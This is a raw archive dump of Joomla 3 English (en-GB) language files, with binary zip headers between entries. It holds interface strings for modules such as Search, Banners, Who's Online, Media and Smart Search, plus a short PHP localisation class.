MOD_ICCALENDAR_TIP_PADDING="Padding is only applied when the width of the screen indicates that a mobile phone is being used. It can be used to create a clear margin between the content and the edge of the tooltip at the top and/or bottom to avoid conflicts with other visible elements."
MOD_ICCALENDAR_LBL_TIP_PADDING="Tooltip Padding"
MOD_ICCALENDAR_DESC_TIP_PADDING="Enter padding in CSS format (e.g. '0 0 50px 0' to raise the content from the bottom of the screen by 50 pixels)."

; Deprecated 3.6.4
MOD_ICCALENDAR_FIELD_MENU_LABEL="Link to Menu Item"
MOD_ICCALENDAR_FIELD_MENU_DESC="Link to a specific menu item, of type 'iCagenda - List of events', in order to use its predefined options"
PK!Y�Wooen-GB/en-GB.mod_banners.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_BANNERS="Banners"
MOD_BANNERS_XML_DESCRIPTION="The Banner Module displays the active Banners from the Component."
MOD_BANNERS_LAYOUT_DEFAULT="Default"

PK!��-�en-GB/en-GB.lib_phputf8.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_PHPUTF8="phputf8"
LIB_PHPUTF8_XML_DESCRIPTION="Classes for UTF-8."

PK!K�n��en-GB/en-GB.mod_whosonline.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WHOSONLINE="Who's Online"
MOD_WHOSONLINE_FIELD_FILTER_GROUPS_DESC="Choose to filter by groups of the connected user"
MOD_WHOSONLINE_FIELD_FILTER_GROUPS_LABEL="Filter Groups"
MOD_WHOSONLINE_FIELD_LINKTOWHAT_DESC="Choose the type of information to display"
MOD_WHOSONLINE_FIELD_LINKTOWHAT_LABEL="Information"
MOD_WHOSONLINE_FIELD_VALUE_BOTH="Both"
MOD_WHOSONLINE_FIELD_VALUE_CONTACT="Contact"
MOD_WHOSONLINE_FIELD_VALUE_NAMES="Usernames"
MOD_WHOSONLINE_FIELD_VALUE_NUMBER="# of Guests / Users"
MOD_WHOSONLINE_FIELD_VALUE_PROFILE="Profile"
MOD_WHOSONLINE_GUESTS="%s&#160;guests"
MOD_WHOSONLINE_GUESTS_1="one guest"
MOD_WHOSONLINE_GUESTS_0="no guests"
MOD_WHOSONLINE_MEMBERS="%s&#160;members"
MOD_WHOSONLINE_MEMBERS_1="one member"
MOD_WHOSONLINE_MEMBERS_0="no members"
MOD_WHOSONLINE_SAME_GROUP_MESSAGE="List of Users who belong to your user groups or your user groups' child groups"
MOD_WHOSONLINE_SHOWMODE_DESC="Select what will be shown"
MOD_WHOSONLINE_SHOWMODE_LABEL="Display"
MOD_WHOSONLINE_XML_DESCRIPTION="The Who's Online Module displays the number of Anonymous Users (e.g. Guests) and Registered Users (ones logged-in) that are currently accessing the website."
; frontend display
; in the following string
; %1$s is for guests and %2$s for members
MOD_WHOSONLINE_WE_HAVE="We have %1$s and %2$s online"
PK!ʔ�Ā	�	en-GB/en-GB.mod_search.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_SEARCH="Search"
MOD_SEARCH_FIELD_BOXWIDTH_DESC="Size of the search text box in characters."
MOD_SEARCH_FIELD_BOXWIDTH_LABEL="Box Width"
MOD_SEARCH_FIELD_BUTTON_DESC="Display a search button."
MOD_SEARCH_FIELD_BUTTON_LABEL="Search Button"
MOD_SEARCH_FIELD_BUTTONPOS_DESC="Position of the button relative to the search box."
MOD_SEARCH_FIELD_BUTTONPOS_LABEL="Button Position"
MOD_SEARCH_FIELD_BUTTONTEXT_DESC="The text that appears in the search button. If left blank, it will load the 'searchbutton' string from your language file."
MOD_SEARCH_FIELD_BUTTONTEXT_LABEL="Button Text"
MOD_SEARCH_FIELD_IMAGEBUTTON_DESC="Use an image as button. This image has to be named searchButton.gif and must be located in templates/*your template name*/images/."
MOD_SEARCH_FIELD_IMAGEBUTTON_LABEL="Search Button Image"
MOD_SEARCH_FIELD_SETITEMID_DESC="Assign an ItemID by selecting a menu item in the list for the display of the search results if there is no com_search menu and a specific display is desired. If you do not know what this means, you may not need it."
MOD_SEARCH_FIELD_SETITEMID_LABEL="Set ItemID"
MOD_SEARCH_FIELD_LABEL_TEXT_DESC="The text that appears in the label of search box. If left blank, it will load 'label' string from your language file."
MOD_SEARCH_FIELD_LABEL_TEXT_LABEL="Box Label"
MOD_SEARCH_FIELD_OPENSEARCH_LABEL="OpenSearch Autodiscovery"
MOD_SEARCH_FIELD_OPENSEARCH_TEXT_LABEL="OpenSearch Title"
MOD_SEARCH_FIELD_OPENSEARCH_TEXT_DESC="Text displayed in supported browsers when adding your site as a search provider."
MOD_SEARCH_FIELD_OPENSEARCH_DESC="Some browsers can add support for your site's search if this option is enabled."
MOD_SEARCH_FIELD_TEXT_DESC="The text that appears in the search text box. If left blank, it will load the 'searchbox' string from your language file."
MOD_SEARCH_FIELD_TEXT_LABEL="Box Text"
MOD_SEARCH_FIELD_VALUE_BOTTOM="Bottom"
MOD_SEARCH_FIELD_VALUE_LEFT="Left"
MOD_SEARCH_FIELD_VALUE_RIGHT="Right"
MOD_SEARCH_FIELD_VALUE_TOP="Top"
MOD_SEARCH_LABEL_TEXT="Search ..."
MOD_SEARCH_SEARCHBOX_TEXT="Search ..."
MOD_SEARCH_SEARCHBUTTON_TEXT="Search"
MOD_SEARCH_SELECT_MENU_ITEMID="Select a menu item"
MOD_SEARCH_XML_DESCRIPTION="This module will display a search box."PK!�Tpƹ�!en-GB/en-GB.mod_languages.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_LANGUAGES="Language Switcher"
MOD_LANGUAGES_XML_DESCRIPTION="This module displays a list of available Content Languages (as defined and published in Language Manager Content tab) for switching between them when you want to use Joomla! as a multilingual site. <br />--The plugin 'System - Language Filter' has to be enabled.--<br />When switching languages and if the item displayed in the page is not associated to another item, the module redirects to the Home page defined for the chosen language.<br />Otherwise, if the parameter is set for the Language filter plugin, it will redirect to the associated item in the language chosen. Thereafter, the navigation will be the one defined for that language. <br />If the plugin <strong>'System - Language Filter'</strong> is disabled, this may have unwanted results.<br /><strong>Method:</strong><br />1. Open Language Manager Content tab and make sure the Languages you want to use in contents are published and have a Language Code for the URL as well as prefix for the image used in the module display.<br />2. Create a Home page by assigning a language to a menu item and defining it as Default Home page for each published content language. <br />3. Thereafter, you can assign a language to any Article, Category, Module, News Feed, Web Links in Joomla.<br />4. Make sure the module is published and the plugin is enabled. <br />5. When using associated items, make sure the module is displayed on the relevant pages. <br />6. The way the flags or names of the languages are displayed is defined by the ordering in the Language Manager - Content Languages.<br ><br >If this module is published, it is suggested to publish the Administrator multilingual status module."
MOD_LANGUAGES_LAYOUT_DEFAULT="Default"

PK!�ӌwwen-GB/en-GB.com_media.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_MEDIA_ALIGN="Image Float"
COM_MEDIA_ALIGN_DESC="This will apply the classes 'pull-left', 'pull-center' or 'pull-right' to the '<figure>' or '<img>' element."
COM_MEDIA_BROWSE_FILES="Browse Files"
COM_MEDIA_CAPTION="Caption"
COM_MEDIA_CAPTION_CLASS_LABEL="Caption Class"
COM_MEDIA_CAPTION_CLASS_DESC="This will apply the entered class to the '<figcaption>' element. For example: 'text-left', 'text-right', 'text-center'."
COM_MEDIA_CLEAR_LIST="Clear List"
COM_MEDIA_CONFIGURATION="Media: Options"
COM_MEDIA_CREATE_FOLDER="Create Folder"
COM_MEDIA_CURRENT_PROGRESS="Current progress"
COM_MEDIA_DESCFTP="To upload, change and delete media files, Joomla! will most likely need your FTP account details. Please enter them in the form fields below."
COM_MEDIA_DESCFTPTITLE="FTP Login Details"
COM_MEDIA_DETAIL_VIEW="Detail View"
COM_MEDIA_DIRECTORY="Folder"
COM_MEDIA_DIRECTORY_UP="Folder Up"
COM_MEDIA_ERROR_BAD_REQUEST="Bad Request"
COM_MEDIA_ERROR_FILE_EXISTS="File already exists."
COM_MEDIA_ERROR_UNABLE_TO_CREATE_FOLDER_WARNDIRNAME="Unable to create folder. Folder name must only have alphanumeric characters and no spaces."
COM_MEDIA_ERROR_UNABLE_TO_BROWSE_FOLDER_WARNDIRNAME="Unable to browse:&#160;%s. Folder name must only have alphanumeric characters and no spaces."
COM_MEDIA_ERROR_UNABLE_TO_DELETE="Unable to delete:&#160;"
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FILE_WARNFILENAME="Unable to delete:&#160;%s. File name must only have alphanumeric characters and no spaces."
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_NOT_EMPTY="Unable to delete:&#160;%s. Folder is not empty!"
COM_MEDIA_ERROR_UNABLE_TO_DELETE_FOLDER_WARNDIRNAME="Unable to delete:&#160;%s. Folder name must only have alphanumeric characters and no spaces."
COM_MEDIA_ERROR_UNABLE_TO_UPLOAD_FILE="Unable to upload file."
COM_MEDIA_ERROR_WARNFILETOOLARGE="This file is too large to upload."
COM_MEDIA_ERROR_WARNUPLOADTOOLARGE="Total size of upload exceeds the limit."
COM_MEDIA_FIELD_CHECK_MIME_DESC="Use MIME Magic or Fileinfo to try to verify files. Try disabling this if you get invalid mime type errors."
COM_MEDIA_FIELD_CHECK_MIME_LABEL="Check MIME Types"
COM_MEDIA_FIELD_IGNORED_EXTENSIONS_DESC="Ignored file extensions for MIME type checking and restricted uploads."
COM_MEDIA_FIELD_IGNORED_EXTENSIONS_LABEL="Ignored Extensions"
COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_DESC="A comma separated list of illegal MIME types to upload (blacklist)."
COM_MEDIA_FIELD_ILLEGAL_MIME_TYPES_LABEL="Illegal MIME Types"
COM_MEDIA_FIELD_LEGAL_EXTENSIONS_DESC="Extensions (file types) you are allowed to upload (comma separated)."
COM_MEDIA_FIELD_LEGAL_EXTENSIONS_LABEL="Legal Extensions (File Types)"
COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_DESC="Image extensions (file types) you are allowed to upload (comma separated). These are used to check for valid image headers."
COM_MEDIA_FIELD_LEGAL_IMAGE_EXTENSIONS_LABEL="Legal Image Extensions (File Types)"
COM_MEDIA_FIELD_LEGAL_MIME_TYPES_DESC="A comma separated list of legal MIME types to upload."
COM_MEDIA_FIELD_LEGAL_MIME_TYPES_LABEL="Legal MIME Types"
COM_MEDIA_FIELD_MAXIMUM_SIZE_DESC="The maximum size for an upload (in megabytes). Use zero for no limit. Note: your server has a maximum limit."
COM_MEDIA_FIELD_MAXIMUM_SIZE_LABEL="Maximum Size (in MB)"
COM_MEDIA_FIELD_PATH_FILE_FOLDER_DESC="Enter the path to the file folder relative to root."
COM_MEDIA_FIELD_PATH_FILE_FOLDER_LABEL="Path to File Folder"
COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_DESC="Enter the path to the image folder relative to root."
COM_MEDIA_FIELD_PATH_IMAGE_FOLDER_LABEL="Path to Image Folder"
COM_MEDIA_FIELD_RESTRICT_UPLOADS_DESC="Restrict uploads for lower than manager users to images if Fileinfo or MIME Magic isn't installed."
COM_MEDIA_FIELD_RESTRICT_UPLOADS_LABEL="Restrict Uploads"
COM_MEDIA_FILES="Files"
COM_MEDIA_FILESIZE="File size"
COM_MEDIA_FOLDER="Folder"
COM_MEDIA_FOLDERS="Folders"
COM_MEDIA_IMAGE_DESCRIPTION="Image Description"
COM_MEDIA_IMAGE_URL="Image URL"
COM_MEDIA_INSERT="Insert"
COM_MEDIA_INSERT_IMAGE="Insert Image"
COM_MEDIA_MAXIMUM_SIZE="Maximum Size"
COM_MEDIA_MEDIA="Media"
COM_MEDIA_NAME="Image Name"
COM_MEDIA_NO_IMAGES_FOUND="No Images Found"
COM_MEDIA_NOT_SET="Not Set"
COM_MEDIA_OVERALL_PROGRESS="Overall Progress"
COM_MEDIA_PIXEL_DIMENSIONS="Pixel Dimensions (w x h)"
COM_MEDIA_START_UPLOAD="Start Upload"
COM_MEDIA_THUMBNAIL_VIEW="Thumbnail View"
COM_MEDIA_TITLE="Image Title"
COM_MEDIA_UP="Up"
COM_MEDIA_UPLOAD="Upload"
; The following two strings are deprecated with 3.7.0 and will be removed in 4.0
COM_MEDIA_UPLOAD_FILES="Upload files (Maximum Size: %s MB)"
COM_MEDIA_UPLOAD_FILES_NOLIMIT="Upload files (No maximum size)"
COM_MEDIA_UPLOAD_COMPLETE="Upload Complete"
COM_MEDIA_UPLOAD_FILE="Upload file"
COM_MEDIA_UPLOAD_SUCCESSFUL="Upload Successful"
PK!H>����"en-GB/en-GB.mod_whosonline.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WHOSONLINE="Who's Online"
MOD_WHOSONLINE_XML_DESCRIPTION="The Who's Online Module displays the number of Anonymous Users (Guests) and Registered Users (users logged-in) that are currently accessing the website."
MOD_WHOSONLINE_LAYOUT_DEFAULT="Default"

PK!�CI@@en-GB/en-GB.lib_fof.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

LIB_FOF_XML_DESCRIPTION="Framework-on-Framework (FOF) - A rapid component development framework for Joomla!"
PK!6񳸜�en-GB/en-GB.mod_banners.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_BANNERS_NO_CLIENT="- No client -"
MOD_BANNERS="Banners"
MOD_BANNERS_BANNER="Banner"
MOD_BANNERS_FIELD_BANNERCLIENT_DESC="Select banners only from a single client."
MOD_BANNERS_FIELD_BANNERCLIENT_LABEL="Client"
MOD_BANNERS_FIELD_CACHETIME_DESC="The time before the module is recached."
MOD_BANNERS_FIELD_CACHETIME_LABEL="Cache Time"
MOD_BANNERS_FIELD_CATEGORY_DESC="Select banners from a specific Category or a set of Categories. If no selection then it will show all categories as default."
MOD_BANNERS_FIELD_COUNT_DESC="The number of banners to display (default 5)."
MOD_BANNERS_FIELD_COUNT_LABEL="Count"
MOD_BANNERS_FIELD_FOOTER_DESC="Text or HTML to display after the group of banners."
MOD_BANNERS_FIELD_FOOTER_LABEL="Footer Text"
MOD_BANNERS_FIELD_HEADER_DESC="Text or HTML to display before the group of banners."
MOD_BANNERS_FIELD_HEADER_LABEL="Header Text"
MOD_BANNERS_FIELD_RANDOMISE_DESC="Randomise the ordering of the banners."
MOD_BANNERS_FIELD_RANDOMISE_LABEL="Randomise"
MOD_BANNERS_FIELD_TAG_DESC="Banner is selected by matching the banner meta keywords to the current document meta keywords."
MOD_BANNERS_FIELD_TAG_LABEL="Search by Meta Keyword"
MOD_BANNERS_FIELD_TARGET_DESC="Target window when the link is selected."
MOD_BANNERS_FIELD_TARGET_LABEL="Target"
MOD_BANNERS_VALUE_STICKYORDERING="Pinned, Ordering"
MOD_BANNERS_VALUE_STICKYRANDOMISE="Pinned, Randomise"
MOD_BANNERS_XML_DESCRIPTION="The Banner Module displays the active Banners from the Component."
PK!ܪgl�� en-GB/en-GB.files_joomla.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

FILES_JOOMLA="Joomla CMS"
FILES_JOOMLA_ERROR_FILE_FOLDER="Error on deleting file or folder %s"
FILES_JOOMLA_ERROR_MANIFEST="Error on updating manifest cache: (type, element, folder, client) = (%s, %s, %s, %s)"
FILES_JOOMLA_XML_DESCRIPTION="Joomla! 3 Content Management System."

PK!i� 
�	�	en-GB/en-GB.com_config.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_CONFIG="Administrator Services"
COM_CONFIG_CONFIGURATION="Administrator Services Configuration"
COM_CONFIG_ERROR_CONTROLLER_NOT_FOUND="Controller Not found!"
COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_DESC="Select the default access level for new content, menu items and other items created on your site."
COM_CONFIG_FIELD_DEFAULT_ACCESS_LEVEL_LABEL="Default Access Level"
COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_DESC="Sets the default length of lists in the Control Panel for all users."
COM_CONFIG_FIELD_DEFAULT_LIST_LIMIT_LABEL="Default List Limit"
COM_CONFIG_FIELD_METADESC_DESC="Enter a description of the overall website that is to be used by search engines. Generally, a maximum of 20 words is best."
COM_CONFIG_FIELD_METADESC_LABEL="Site Meta Description"
COM_CONFIG_FIELD_METAKEYS_DESC="Enter the keywords and phrases that best describe your website. Separate keywords and phrases with a comma."
COM_CONFIG_FIELD_METAKEYS_LABEL="Site Meta Keywords"
COM_CONFIG_FIELD_SEF_URL_DESC="Select if the URLs are optimised for Search Engines."
COM_CONFIG_FIELD_SEF_URL_LABEL="Search Engine Friendly URLs"
COM_CONFIG_FIELD_SITE_NAME_DESC="Enter the name of your website. This will be used in various locations (eg the Backend browser title bar and <em>Site Offline</em> pages)."
COM_CONFIG_FIELD_SITE_NAME_LABEL="Site Name"
COM_CONFIG_FIELD_VALUE_AFTER="After"
COM_CONFIG_FIELD_VALUE_BEFORE="Before"
COM_CONFIG_FIELD_SITE_OFFLINE_DESC="Select if access to the Site Frontend is available. If Yes, the Frontend will display a message if set such in Backend."
COM_CONFIG_FIELD_SITE_OFFLINE_LABEL="Site Offline"
COM_CONFIG_FIELD_SITENAME_PAGETITLES_DESC="Begin or end all Page Titles with the site name (for example, My Site Name - My Article Name)."
COM_CONFIG_FIELD_SITENAME_PAGETITLES_LABEL="Site Name in Page Titles"
COM_CONFIG_METADATA_SETTINGS="Metadata Settings"
COM_CONFIG_MODULES_MODULE_NAME="Module Name"
COM_CONFIG_MODULES_MODULE_TYPE="Module Type"
COM_CONFIG_MODULES_SETTINGS_TITLE="Module Settings"
COM_CONFIG_MODULES_SAVE_SUCCESS="Module saved."
COM_CONFIG_SAVE_SUCCESS="Configuration saved."
COM_CONFIG_SEO_SETTINGS="SEO Settings"
COM_CONFIG_SITE_SETTINGS="Site Settings"
COM_CONFIG_TEMPLATE_SETTINGS="Template Settings"
COM_CONFIG_XML_DESCRIPTION="Frontend Administrator Services Configuration Manager."
PK!-Ol&PPen-GB/en-GB.mod_search.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_SEARCH="Search"
MOD_SEARCH_XML_DESCRIPTION="This module will display a search box."
MOD_SEARCH_LAYOUT_DEFAULT="Default"

PK!VD1H��en-GB/en-GB.mod_finder.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

; Strings going to the component
COM_FINDER_FILTER_BRANCH_LABEL="Search by %s"
COM_FINDER_FILTER_SELECT_ALL_LABEL="Search All"
COM_FINDER_ADVANCED_SEARCH="Advanced Search"
COM_FINDER_SELECT_SEARCH_FILTER="- No Filter -"

; Module strings
MOD_FINDER="Smart Search"
MOD_FINDER_CONFIG_OPTION_BOTTOM="Bottom"
MOD_FINDER_CONFIG_OPTION_TOP="Top"
MOD_FINDER_FIELDSET_ADVANCED_ALT_DESCRIPTION="An alternative label for the search field."
MOD_FINDER_FIELDSET_ADVANCED_ALT_LABEL="Alternative Label"
MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_DESCRIPTION="The position of the search button relative to the search field."
MOD_FINDER_FIELDSET_ADVANCED_BUTTON_POS_LABEL="Button Position"
MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_DESCRIPTION="The width of the search field by character length."
MOD_FINDER_FIELDSET_ADVANCED_FIELD_SIZE_LABEL="Search Field Size"
MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_DESCRIPTION="The position of the search label relative to the search field."
MOD_FINDER_FIELDSET_ADVANCED_LABEL_POS_LABEL="Label Position"
MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_DESCRIPTION="Assign an ItemID by selecting a menu item in the list for the display of the search results if there is no com_finder menu item and a specific display is desired. If you do not know what this means, you may not need it."
MOD_FINDER_FIELDSET_ADVANCED_SETITEMID_LABEL="Set ItemID"
MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_DESCRIPTION="Show or hide a button for the search form."
MOD_FINDER_FIELDSET_ADVANCED_SHOW_BUTTON_LABEL="Search Button"
MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_DESCRIPTION="Show or hide a label for the search field."
MOD_FINDER_FIELDSET_ADVANCED_SHOW_LABEL_LABEL="Search Field Label"
MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_DESCRIPTION="Show or hide automatic search suggestions."
MOD_FINDER_FIELDSET_BASIC_AUTOSUGGEST_LABEL="Search Suggestions"
MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_DESCRIPTION="Selecting a Search Filter will limit any searches submitted through this module to use the selected filter."
MOD_FINDER_FIELDSET_BASIC_SEARCHFILTER_LABEL="Search Filter"
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_DESCRIPTION="Show or hide advanced search options. If set to Link to Component option creates a Smart Search link which redirects to the smart search view. If set to show, the advanced search options will be displayed inline."
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_LABEL="Advanced Search"
MOD_FINDER_FIELDSET_BASIC_SHOW_ADVANCED_OPTION_LINK="Link to Component"
MOD_FINDER_FIELD_OPENSEARCH_DESCRIPTION="Some browsers can add support for your site's search if this option is enabled."
MOD_FINDER_FIELD_OPENSEARCH_LABEL="OpenSearch Autodiscovery"
MOD_FINDER_FIELD_OPENSEARCH_TEXT_DESCRIPTION="Text displayed in supported browsers when adding your site as a search provider."
MOD_FINDER_FIELD_OPENSEARCH_TEXT_LABEL="OpenSearch title"
MOD_FINDER_SEARCHBUTTON_TEXT="Search"
MOD_FINDER_SEARCH_BUTTON="Go"
MOD_FINDER_SEARCH_VALUE="Search ..."
MOD_FINDER_SELECT_MENU_ITEMID="Select a menu item"
MOD_FINDER_XML_DESCRIPTION="This is a Smart Search module."
PK!��hrren-GB/en-GB.mod_custom.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_CUSTOM="Custom"
MOD_CUSTOM_XML_DESCRIPTION="This module allows you to create your own Module using a WYSIWYG editor."
MOD_CUSTOM_LAYOUT_DEFAULT="Default"

PK!$z@�kken-GB/en-GB.localise.phpnu&1i�<?php
/**
 * @package    Joomla.Language
 *
 * @copyright  Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * en-GB localise class.
 *
 * @since  1.6
 */
abstract class En_GBLocalise
{
	/**
	 * Returns the potential suffixes for a specific number of items
	 *
	 * @param   integer  $count  The number of items.
	 *
	 * @return  array  An array of potential suffixes.
	 *
	 * @since   1.6
	 */
	public static function getPluralSuffixes($count)
	{
		if ($count == 0)
		{
			return array('0');
		}
		elseif ($count == 1)
		{
			return array('ONE', '1');
		}
		else
		{
			return array('OTHER', 'MORE');
		}
	}

	/**
	 * Returns the ignored search words
	 *
	 * @return  array  An array of ignored search words.
	 *
	 * @since   1.6
	 */
	public static function getIgnoredSearchWords()
	{
		return array('and', 'in', 'on');
	}

	/**
	 * Returns the lower length limit of search words
	 *
	 * @return  integer  The lower length limit of search words.
	 *
	 * @since   1.6
	 */
	public static function getLowerLimitSearchWord()
	{
		return 3;
	}

	/**
	 * Returns the upper length limit of search words
	 *
	 * @return  integer  The upper length limit of search words.
	 *
	 * @since   1.6
	 */
	public static function getUpperLimitSearchWord()
	{
		return 20;
	}

	/**
	 * Returns the number of chars to display when searching
	 *
	 * @return  integer  The number of chars to display when searching.
	 *
	 * @since   1.6
	 */
	public static function getSearchDisplayedCharactersNumber()
	{
		return 200;
	}
}
PK!_}ss$en-GB/en-GB.mod_users_latest.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_USERS_LATEST="Latest Users"
MOD_USERS_LATEST_XML_DESCRIPTION="This module displays the latest registered users."
MOD_USERS_LATEST_LAYOUT_DEFAULT="Default"

PK!,�?ffen-GB/en-GB.com_finder.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

COM_FINDER="Smart Search"
COM_FINDER_ADVANCED_SEARCH_TOGGLE="Advanced Search"
COM_FINDER_ADVANCED_TIPS="<p>Here are a few examples of how you can use the search feature:</p><p>Entering <span class="_QQ_"term"_QQ_">this and that</span> into the search form will return results with both &quot;this&quot; and &quot;that&quot;.</p><p>Entering <span class="_QQ_"term"_QQ_">this not that</span> into the search form will return results with &quot;this&quot; and not &quot;that&quot;.</p><p>Entering <span class="_QQ_"term"_QQ_">this or that</span> into the search form will return results with either &quot;this&quot; or &quot;that&quot;.</p><p>Entering <span class="_QQ_"term"_QQ_">&quot;this and that&quot;</span> (with quotes) into the search form will return results with the exact phrase &quot;this and that&quot;.</p><p>Search results can also be filtered using a variety of criteria. Select one or more filters below to get started.</p>"
COM_FINDER_DEFAULT_PAGE_TITLE="Search Results"
COM_FINDER_FILTER_BRANCH_LABEL="Search by %s"
COM_FINDER_FILTER_DATE_BEFORE="Before"
COM_FINDER_FILTER_DATE_EXACTLY="Exactly"
COM_FINDER_FILTER_DATE_AFTER="After"
COM_FINDER_FILTER_DATE1="Start Date"
COM_FINDER_FILTER_DATE1_DESC="Enter a date in YYYY-MM-DD format."
COM_FINDER_FILTER_DATE2="End Date"
COM_FINDER_FILTER_DATE2_DESC="Enter a date in YYYY-MM-DD format."
COM_FINDER_FILTER_SELECT_ALL_LABEL="Search All"
COM_FINDER_FILTER_WHEN_AFTER="After"
COM_FINDER_FILTER_WHEN_BEFORE="Before"
COM_FINDER_QUERY_DATE_CONDITION_AFTER="after"
COM_FINDER_QUERY_DATE_CONDITION_BEFORE="before"
COM_FINDER_QUERY_DATE_CONDITION_EXACT="exactly on"
COM_FINDER_QUERY_END_DATE="ending date <span class="_QQ_"when"_QQ_">%s</span> <span class="_QQ_"date"_QQ_">%s</span>"
COM_FINDER_QUERY_OPERATOR_AND="and"
COM_FINDER_QUERY_OPERATOR_OR="or"
COM_FINDER_QUERY_OPERATOR_NOT="not"
COM_FINDER_QUERY_FILTER_BRANCH_VENUE="venue"
COM_FINDER_QUERY_START_DATE="beginning date <span class="_QQ_"when"_QQ_">%s</span> <span class="_QQ_"date"_QQ_">%s</span>"
COM_FINDER_QUERY_TAXONOMY_NODE="with <span class="_QQ_"node"_QQ_">%s</span> as <span class="_QQ_"branch"_QQ_">%s</span> "
COM_FINDER_QUERY_TOKEN_EXCLUDED="<span class="_QQ_"term"_QQ_">%s</span> should be excluded"
COM_FINDER_QUERY_TOKEN_GLUE=", and "
COM_FINDER_QUERY_TOKEN_INTERPRETED="Assuming %s, the following results were found."
COM_FINDER_QUERY_TOKEN_OPTIONAL="<span class="_QQ_"term"_QQ_">%s</span> is optional"
COM_FINDER_QUERY_TOKEN_REQUIRED="<span class="_QQ_"term"_QQ_">%s</span> is required"
COM_FINDER_SEARCH_NO_RESULTS_BODY="No search results could be found for query: %s."
COM_FINDER_SEARCH_NO_RESULTS_BODY_MULTILANG="No search results in English (en-GB) could be found for query: %s."
COM_FINDER_SEARCH_NO_RESULTS_HEADING="No Results Found"
COM_FINDER_SEARCH_RESULTS_OF="Results <strong>%s</strong> - <strong>%s</strong> of <strong>%s</strong>"
COM_FINDER_SEARCH_SIMILAR="Did you mean: %s?"
COM_FINDER_SEARCH_TERMS="Search Terms:"
PK!x���HHen-GB/en-GB.mod_falang.ininu&1i�MOD_FALANG="FaLang Language Switcher"
MOD_FALANG_XML_DESCRIPTION="This module lets display in frontend the items tagged to a specific language"
MOD_FALANG_FIELD_ACTIVE_DESC="Display or not the active language. If displayed, the class 'lang-active' will be added to the element."
MOD_FALANG_FIELD_ACTIVE_LABEL="Active Language"
MOD_FALANG_FIELD_DROPDOWN_DESC="If set to 'Yes', the display parameters below will be ignored. The content languages native names will display in a dropdown."
MOD_FALANG_FIELD_DROPDOWN_LABEL="Use Dropdown"
MOD_FALANG_FIELD_FOOTER_DESC="This is the text or HTML that is displayed below the language switcher"
MOD_FALANG_FIELD_FOOTER_LABEL="Post-text"
